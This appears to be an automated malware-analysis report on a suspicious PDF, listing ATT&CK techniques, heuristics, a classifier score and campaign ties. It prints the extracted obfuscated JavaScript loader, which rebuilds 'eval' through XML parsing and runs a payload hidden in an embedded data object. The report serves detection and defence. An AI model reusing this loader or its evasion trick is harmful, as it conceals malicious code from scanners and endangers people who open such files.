SUSPICIOUS
54
Risk Score
Malware Insights
MITRE ATT&CK
T1059.007 JavaScript
T1566.001 Spearphishing Attachment
The PDF contains embedded JavaScript which is obfuscated but appears to reconstruct the string 'eval' and then call it with content derived from an embedded data object named 'xampp'. This suggests the script is intended to download and execute a second-stage payload. The ML classifier strongly indicates maliciousness.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 3
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded file low PDF_EMBEDDEDPDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
🗂 Part of campaign:
shared payload 1bc4bf38a7
55 samples
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0007_000.js |
pdf-javascript-stream | PDF /JS object 7 at offset 0x1CC | 254 bytes |
SHA-256: 1bc4bf38a788adcc495fb84f1f085cb4c62f9f214ddac09c9e3dd447973e35e6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
ra=this.getDataObjectContents("xampp");rb=util.stringFromStream(ra, "utf-8");rc="";for (i=0;i<rb.length;i +=18){ rc +=rb.charAt(i);}rd="<test><one>ev</one><two>al</two></test>";re=XMLData.parse(rd); rf=re.one.value+re.two.value;this[rf](rc);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.